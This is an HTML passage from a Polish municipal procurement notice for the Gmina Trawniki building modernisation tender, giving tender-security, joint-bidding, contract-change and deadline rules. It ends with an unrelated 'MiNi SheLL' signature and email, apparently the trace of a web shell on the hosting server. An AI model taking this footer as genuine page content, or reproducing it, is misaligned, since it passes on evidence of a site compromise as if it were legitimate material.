oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Wykonawca wniesie wadium w wysokości:<br/>A) Dla części I zamówienia 30 000,00 zł (słownie: trzydzieści tysięcy złotych 00/100).<br/>B) Dla części II zamówienia 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100).<br/>2.Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: <br/>1) pieniądzu;<br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2022 r. poz. 2080 z późn. zm.). <br/>3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego pod numerem: <br/>Spółdzielczy Bank Powiatowy Piaski Oddział Trawniki<br/>Nr 52 8689 0007 2000 0293 2000 0030<br/>z adnotacją „Wadium w postępowaniu „Budowa i modernizacja infrastruktury społecznej, edukacyjnej, kulturalnej oraz poprawa efektywności energetycznej budynków publicznych Gminy Trawniki”- część........*”.<br/>* wskazać część na którą wykonawca składa ofertę <br/>w terminie do dnia składania ofert (decyduje termin wpływu środków na rachunek Zamawiającego). <br/>4.Jeżeli wadium jest wnoszone w przez Wykonawców wspólnie ubiegających się o zamówienia, w innej formie niż pieniężnej, wadium musi dotyczyć wszystkich Wykonawców wspólnie ubiegających się o zamówienie np. poprzez wymienienie wszystkich Wykonawców bądź wskazanie, że Wykonawca wskazany w treści gwarancji/poręczenia działa jako pełnomocnik, lider itp.<br/>5.Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej (umocowanego) przedstawiciela Gwaranta lub Poręczyciela wraz z plikami stanowiącymi ofertę.<br/>6.Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>7.Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>8.Złożenie wniosku o zwrot wadium, o którym mowa w ust. 7, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej. <br/>9.Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. <br/>10.Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia, o których mowa w pkt. 7.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno potwierdzać ten fakt. Oświadczenie należy złożyć wg wymogów Załącznika nr 5 do SWZ.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 7.6. SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt. 7.6.1. SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku.<br/>3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy<br/>1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych, strony dopuszczają możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1 może nastąpić w przypadku wystąpienia okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia lub etapu nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej;<br/>2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1 może nastąpić w przypadku skierowania przez Zamawiającego do Wykonawcy pisemnego żądania wstrzymania robót budowlanych, stanowiących przedmiot zamówienia lub wydania zakazu prowadzenia robót budowlanych, stanowiących przedmiot zamówienia przez organ administracji publicznej lub eksploatorów infrastruktury, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia lub etapu nastąpi o liczbę dni, odpowiadającą okresowi na jaki Wykonawcy nakazano wstrzymanie robót budowlanych lub zakazano prowadzenia robót budowlanych;<br/>3)	przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1 może nastąpić w przypadku wystąpienia kolizji z instalacjami wewnętrznymi lub zewnętrznymi nieujawnionymi w dokumentacji projektowej, lub innymi robotami prowadzonymi przez innego wykonawcę, przy czym przedłużenie terminu realizacji zamówienia lub etapu nastąpi o liczbę dni niezbędną Wykonawcy na usunięcie kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej lub o liczbę dni niezbędnych do wykonania robót przez innego wykonawcę – o ile usunięcie kolizji wymagać będzie przedłużenia terminu realizacji;<br/>4) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1 może nastąpić w przypadku wystąpienia konieczności wprowadzenia w dokumentacji projektowej zmian, powodujących wstrzymanie lub przerwanie robót budowlanych, stanowiących przedmiot zamówienia, przy czym przedłużenie terminu realizacji zamówienia lub etapu nastąpi o liczbę dni niezbędną do wprowadzenia zmian w dokumentacji projektowej oraz do przeprowadzenia uzgodnień (ustaleń) z właściwymi organami, uzyskania opinii właściwych organów oraz wydania decyzji przez właściwe organy, przy czym wprowadzenie w dokumentacji projektowej zmian nie może skutkować zwiększeniem (zmianą) zakresu świadczenia Wykonawcy zawartego w ofercie, stanowiącej załącznik nr 3 do umowy oraz zwiększeniem wynagrodzenia Wykonawcy, o którym mowa w § 3 ust. 1;<br/>5) przedłużenia terminu realizacji zamówienia o którym mowa w § 2 ust.1, może nastąpić w zakresie niezbędnym do wykonania robót zleconych na podstawie art. 455 ust. 1 pkt 1, 3, 4 lub ust. 2 ustawy Prawo zamówień publicznych,<br/>6) zmiana terminu wykonania zamówienia lub zakresu świadczeń lub sposobu wykonywania zamówienia może nastąpić w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na termin realizacji przedmiotu zamówienia lub zakres świadczeń stron umowy lub sposób jej wykonywania,<br/>Ze względu na ilość znaków pozostała treść zmian znajduje się w § 17 Projektu umowy. Dodatkowo w § 17a opisane są zmiany dotyczące klauzuli waloryzacyjnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-09 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem za pośrednictwem Platformy zakupowej pod adresem: https://platformazakupowa.pl/pn/trawniki w zakładce „OFERTY&#34;.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-09 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com